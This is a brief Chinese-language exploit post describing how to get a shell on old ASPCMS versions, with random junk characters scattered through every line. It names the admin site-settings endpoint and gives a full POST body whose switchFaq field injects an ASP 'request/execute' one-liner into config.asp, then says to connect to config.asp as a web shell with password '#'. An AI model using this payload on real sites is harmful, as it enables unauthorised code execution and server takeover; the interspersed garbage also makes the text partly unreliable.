老的ASPCMS版本的秒杀拿SHELL漏洞 n& w: ^* Z, h; `- x4 i' m
6 g* W: I4 u g4 |- a 找到后台。。。然后0 L( n, ]' L0 {* t7 N, ^# r$ C! z
" a+ Z/ r& u- H1 A+ X$ O. f7 S# Y/admin/_system/AspCms_SiteSetting.asp?action=saves
T8 c' t8 a( m% ] . H4 a- U! W3 N$ I' B/ t
直接POST
. n* S$ B$ F$ d# W! H& z4 ^. K
" f, q E9 W* c' L; Z* |) krunMode=1&siteMode=1&siteHelp=%B1%BE%CD%F8%D5%BE%D2%F2%B3%CC%D0%F2%C9%FD%BC%B6%B9%D8%B1%D5%D6%D0&SwitchComments=1&SwitchCommentsStatus=1&switchFaq=0:Y=request(chr(35)):execute(Y)&SwitchFaqStatus=0&dirtyStr=&waterMark=1&waterMarkFont=hahahaha&waterMarkLocation=1&smtp_usermail=aspcmstest%40163.com&smtp_user=aspcmstest&smtp_password=aspcms.cn&smtp_server=smtp.163.com&MessageAlertsEmail=13322712%40qq.com&messageReminded=1&orderReminded=1&applyReminded=1&commentReminded=1&LanguageID=1
! n: J1 S% u/ g, } {5 r
9 {, e/ U6 R$ D. C, I/ r8 I8 T再连接配置文件config.asp 密码为#
, l4 n( R- {- k6 _ |